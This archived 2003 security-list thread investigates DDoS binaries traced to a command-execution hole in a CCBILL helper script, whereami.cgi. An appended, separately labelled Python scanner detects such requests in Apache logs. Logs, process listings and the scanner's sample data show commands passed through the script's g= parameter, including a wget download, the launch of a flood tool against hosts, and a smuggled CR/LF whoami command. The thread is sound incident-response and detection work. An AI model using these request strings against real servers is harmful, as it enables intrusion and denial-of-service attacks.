RE: Another overflow exploit for Apache? *RESOLVED*

From: xtm (xtmat_private)
Date: Thu Jul 03 2003 - 12:39:17 PDT


    As far as I can see from the whereami.cgi from one of my client's sites, it
    just shows values from
    
    ($dev, $ino, $mode, $nlink, $uid, $gid, $rdev, $size,
      $mtime, $ctime, $blksize, $blocks) = stat("./whereami.cgi");
    
    and there is no backdoor-like interface to the command line.
    You must be reviewing an already backdoored script.
    
    -xtm
    
    
    
    > -----Original Message-----
    > From: Dayne Jordan [mailto:djordanat_private]
    > Sent: Thursday, July 03, 2003 9:47 PM
    > To: incidentsat_private
    > Subject: Another overflow exploit for Apache? *RESOLVED*
    >
    >
    > Greetings again,
    >
    > We found that this exploit was NOT a result of an Apache exploit.
    >
    > After waiting for the culprits to attempt their mischief again, we were
    > waiting and watched as they re-uploaded their rogue Ddos scripts to /tmp
    > and executed thru Apache - not to our surprise, it appears CCBILL once
    > again has some very exploitable 'helper' scripts they upload when
    > installing
    > their software.
    >
    > On ALL the machines with the Ddos behavior we found, there was one common
    > script on all of them ' whereami.cgi '. This script, when executed from
    > the browser allows system commands to be entered and executed as the web
    > server. We even used wget and lynx thru this command interface to upload
    > various things into /tmp/. Our culprits were uploading old-school
    > and common
    > Ddos binaries, then executing them.. nothing root worthy, but nonetheless
    > a pain in the arse.
    >
    > Excerpt log entries from our test machines:
    >
    > Machine getting it - how we uploaded a test binary:
    > 216.226.xxx.xxx - - [03/Jul/2003:12:00:00 -0400] "POST
    > /ccbill/whereami.cgi?g=ls
    > HTTP/1.1" 200 1033 "http://our.test.fileserver/ccbill/whereami.cgi?g=ls"
    > "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; H010818; T312461)"
    >
    > Machine serving it:
    > 216.226.xxx.xxx - - [03/Jul/2003:11:59:59 -0400] "GET
    > /rogue-test.tar HTTP/1.0"
    >                     200 286720 "-" "Wget/1.5.1"
    >
    > Other things we did with it:
    > 216.226.xxx.xxx - - [03/Jul/2003:12:44:41 -0400] "GET
    >                     /ccbill/whereami.cgi?g=mkdir%20/tmp/boo
    >                     HTTP/1.1" 200 247 "-" "Mozilla/4.0
    >                     (compatible; MSIE 5.5; Windows 98; H010818; T312461)"
    >
    > and then...
    >
    > su-2.02# ls -la /tmp
    > drwxrwxrwt   6 root    wheel    3072 Jul  3 12:42 .
    > drwxr-xr-x  19 root    wheel     512 Mar 17 17:01 ..
    > drwxr-xr-x   2 nobody  wheel     512 Jul  3 12:44 boo
    > srwxrwxrwx   1 mysql   wheel       0 Jul  3 00:05 mysql.sock
    > [snipped]
    >
    > And snippet from one of the affected machines running 'hell' a simple
    > Ddos binary:
    > 172.157.111.201 - - [01/Jul/2003:16:58:20 -0400] "GET
    > /ccbill/whereami.cgi?g=v/hell
    >                     HTTP/1.1" 200 265 "-" "Mozilla/4.0
    >
    > Once you initiate the /whereami.cgi?g=ls command from the
    > browser, you then
    > get an input box and an enter button on your browser - execute any command
    > you like, including wget, lynx, tar, sh, etc etc.
    >
    > This script is most likely used by CCBILL techs as part of their default
    > installation so that they can administer/setup their necessary
    > scripts/software. Unfortunately,
    > there is a huge hole in this script. We have a customer who very
    > recently had CCBILL setup their services on his website and the very same
    > 'whereami.cgi' exists even on this current date build.
    >
    > So in short, those of you who use CCBILL make sure to remove or render
    > useless the 'whereami.cgi' script in your /ccbill directory(ies). Across
    > all our machines where we know CCBILL exists we've found this script on
    > every one so far - and removed it ;)
    >
    > D.
    > =========
    >
    >
    > >
    > > Greetings,
    > >
    > > Over the past 2 days we were alerted to 2 machines doing over
    > 10mbits/sec
    > > each. Upon further investigation here is what we found...
    > >
    > > Lets start with OS and essentials:
    > > =====================================
    > > - BSDi 4.2, patched current
    > > - Apache 1.3.27 (running as nobody:nobody) non-suexec
    > > - PHP-4.3.2 (allow_uploads=Off)
    > >
    > > We have found v2k.tar uploaded to /tmp/ and a new directory: /tmp/v/.
    > >
    > > su-2.02# ls -la /tmp
    > > drwxrwxrwt   2 root    wheel     2560 Jul  2 13:40 .
    > > drwxr-xr-x  17 root    wheel      512 Nov  3  2002 ..
    > > -rw-r--r--   1 nobody  wheel  1762550 Jul  2 12:07 iprot-ip_log
    > > -rw-r--r--   1 nobody  wheel   739326 Jul  2 11:13 iprot-user_log
    > > -rw-r--r--   1 nobody  wheel    16384 Jul  2 13:48 iprot.db
    > > srwxrwxrwx   1 root    wheel        0 Apr 29 02:16 mysql.sock
    > > drwxr-xr-x   3 nobody  wheel      512 Oct  9  2002 v
    > > -rw-r--r--   1 nobody  wheel   253952 Jul  2 09:21 v2k.tar
    > >
    > > Contents of /tmp/v:
    > >
    > > su-2.02# ls -lR
    > > total 164
    > > -rwxr-xr-x  1 nobody  wheel   13157 Nov 28  2002 hell
    > > -rw-r--r--  1 nobody  wheel  102400 Sep 13  2002 k.tar
    > > drwxr-xr-x  2 nobody  wheel     512 Nov 28  2002 netbios
    > > -rwxr-xr-x  1 nobody  wheel   21866 Oct  9  2002 usg
    > > -rwxr-xr-x  1 nobody  wheel   15807 Nov  8  2002 vadimI
    > >
    > > ./netbios:
    > > total 94
    > > -rwxr-xr-x  1 nobody  wheel  53760 Nov 28  2002 nbtscan
    > > -rwxr-xr-x  1 nobody  wheel  18070 Nov 28  2002 smbkill
    > > -rwxr-xr-x  1 nobody  wheel  23305 Nov 28  2002 smbnuke
    > >
    > > The program found running was 'hell':
    > > An excerpt from ps aux/axl:
    > >
    > > nobody 3981 1   252 22385e0 0 I   ?? 0:00.01 sh -c v/hell
    > 62.221.xxx.xx 110 2>&1
    > > nobody 3982 3981 252 22385e0 0 RN  ??   10:17.28 v/hell
    > 62.221.xxx.xx 110
    > > nobody 4002 1 252 22385e0 0 I ??  0:00.07 sh -c v/hell
    > 62.221.xxx.xx 110 2>&1
    > > nobody 4003 4002 252 22385e0    0 R     ??    9:53.19 v/hell
    > 62.221.xxx.xx 110
    > > nobody 4033 1 252 22385e0 0 I ?? 0:00.09 sh -c v/hell
    > 202.8.xxx.xxx 110 2>&1
    > > nobody 4034 4033 252 22385e0 0 R  ??  8:18.19 v/hell 202.8.xxx.xxx 110
    > > nobody 4051 1 252 22385e0 0 I ?? 0:00.08 sh -c v/hell
    > 202.8.xxx.xxx 110 2>&1
    > > nobody 4052 4051 252 22385e0 0 R ?? 7:40.63 v/hell 202.8.xxx.xxx 110
    > > nobody 4122 1 252 22385e0 0 I ?? 0:00.04 sh -c v/hell
    > 202.73.xxx.xxx 110\r\nwhoami; 2>&1
    > > nobody 4179 1 252 22385e0 0 I ?? 0:00.06 sh -c v/hell
    > 202.73.xxx.xxx 110\r\nwhoami; 2>&1
    > > nobody 4180 4179 252 22385e0 0 R ?? 4:43.55 v/hell 202.73.xxx.xxx 110\r
    > > nobody 4213 1 252 22385e0 0 I  ?? 0:00.05 sh -c v/hell
    > 66.151.xx.xx 110\r\nwhoami; 2>&1
    > >
    > > su-2.02# strings hell
    > > /lib/ld-linux.so.2
    > > __gmon_start__
    > > libc.so.6
    > > printf
    > > connect
    > > socket
    > > bzero
    > > send
    > > __deregister_frame_info
    > > bcopy
    > > gethostbyname
    > > htons
    > > exit
    > > atoi
    > > _IO_stdin_used
    > > __libc_start_main
    > > __register_frame_info
    > > GLIBC_2.0
    > > PTRh
    > > Bombing %s, port %d
    > > Unknown host: %s
    > > Syntax: ./hell host port
    > > Port can be any port, any of them work equally well
    > > FUCKER!!!!
    > > su-2.02#
    > >
    > > -System binaries are fine checking via known good BSDi 4.2
    > machines md5 output
    > > -Nothing unusual running via netstat/sockstat
    > > -Scanned externally for anything rogue listening - 0 found.
    > > -root/admin accounts are not compromised
    > >
    > > The v2k.tar date/time was 09:21 July 2nd, 2003. A grep thru all
    > the webserver
    > > logs for 1-2 minutes on either side of that time do not reveal
    > any unusual
    > > requests that would look like an overflow type string that
    > we've seen attempted
    > > in the past.
    > >
    > > Any clues?
    > >
    > > D.
    > > ===========
    >
    > ------------------------------------------------------------------
    > ----------
    > Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
    > world's premier technical IT security event! 10 tracks, 15
    > training sessions,
    > 1,800 delegates from 30 nations including all of the top experts,
    > from CSO's to
    > "underground" security specialists.  See for yourself what the
    > buzz is about!
    > Early-bird registration ends July 3.  This event will sell out.
    > www.blackhat.com
    > ----------------------------------------------------------------------------
    
    
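The thread shows the only artifacts a defender usually has after the fact: Apache access-log entries where the command is carried in the `g=` parameter of whereami.cgi, URL-encoded, and process listings where the arguments even contain `\r\nwhoami;`. The following Python log scanner is an added example and is not code from this thread, from CCBILL or from either poster. It parses combined-format access-log lines, picks out requests to whereami.cgi, URL-decodes the `g=` value so the analyst sees the command that ran as the web-server user, and flags decoded values containing shell metacharacters or embedded newlines. The script name, the `g` parameter and the request paths come from Dayne's mail; the sample log lines are constructed for this example (addresses masked the way the list did), and `WATCHED_SCRIPTS` is an assumption you would extend with whatever other helper scripts a review turns up.

```python
"""Find requests that drove a command-executing CGI (whereami.cgi) in Apache logs.

Added example, not part of the original thread.  It reads Apache "combined"
format lines, isolates hits on watched CGI scripts, decodes the ``g=``
parameter and reports the command together with a flag for shell metacharacters.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
# Only the fields up to the byte count are needed here; the rest is ignored.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>HTTP/\d\.\d))?" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Path suffixes of scripts known to execute a request parameter (assumption: extend as needed).
WATCHED_SCRIPTS = ("/whereami.cgi",)
# The parameter whereami.cgi executes, per the thread.
COMMAND_PARAM = "g"
# Metacharacters or line breaks inside a decoded command are worth a closer look.
SHELL_META = re.compile(r"[;&|`$<>]|\r|\n")

# Constructed sample log lines, modelled on the entries posted to the list.
SAMPLE_LOG = """\
216.226.xxx.xxx - - [03/Jul/2003:12:00:00 -0400] "POST /ccbill/whereami.cgi?g=ls HTTP/1.1" 200 1033 "http://our.test.fileserver/ccbill/whereami.cgi?g=ls" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
216.226.xxx.xxx - - [03/Jul/2003:12:44:41 -0400] "GET /ccbill/whereami.cgi?g=mkdir%20/tmp/boo HTTP/1.1" 200 247 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
172.157.111.201 - - [01/Jul/2003:16:58:20 -0400] "GET /ccbill/whereami.cgi?g=v/hell HTTP/1.1" 200 265 "-" "Mozilla/4.0"
172.157.111.201 - - [01/Jul/2003:16:59:02 -0400] "GET /ccbill/whereami.cgi?g=v/hell%2062.221.xxx.xx%20110%0D%0Awhoami%3B HTTP/1.1" 200 265 "-" "Mozilla/4.0"
192.0.2.10 - - [03/Jul/2003:12:46:00 -0400] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
"""


def parse_line(line):
    """Return the fields of one combined-format log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def command_from_request(target):
    """Return the decoded command sent to a watched CGI.

    None means the request is not for a watched script; an empty string means the
    script was hit without the command parameter (still worth recording).
    """
    parts = urlsplit(target)
    if not parts.path.endswith(WATCHED_SCRIPTS):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get(COMMAND_PARAM)
    if not values:
        return ""
    return values[0]  # parse_qs already applied %XX and '+' decoding


def scan(lines):
    """Return one finding per request to a watched CGI, in log order."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # wrapped or malformed line; a real run would log these separately
        cmd = command_from_request(rec["target"])
        if cmd is None:
            continue
        findings.append({
            "host": rec["host"],
            "time": rec["time"],
            "method": rec["method"],
            "status": rec["status"],
            "command": cmd,
            "shell_meta": bool(SHELL_META.search(cmd)),
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        flag = "META" if f["shell_meta"] else "    "
        print(f"{flag} {f['time']} {f['host']} {f['method']} {f['status']} -> {f['command']!r}")
```

Run it against the real access logs with `scan(open(path))`; the interesting output is the decoded command column, which in Dayne's case would read `ls`, `mkdir /tmp/boo` and `v/hell`, and the META flag picks out the request that smuggled a second command after a CR/LF, matching the `\r\nwhoami;` visible in his ps output. Mail-client line wrapping (as in the posted excerpts) breaks the regex, so feed it the original log file rather than a pasted copy.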
    



    This archive was generated by hypermail 2b30 : Thu Jul 03 2003 - 13:06:11 PDT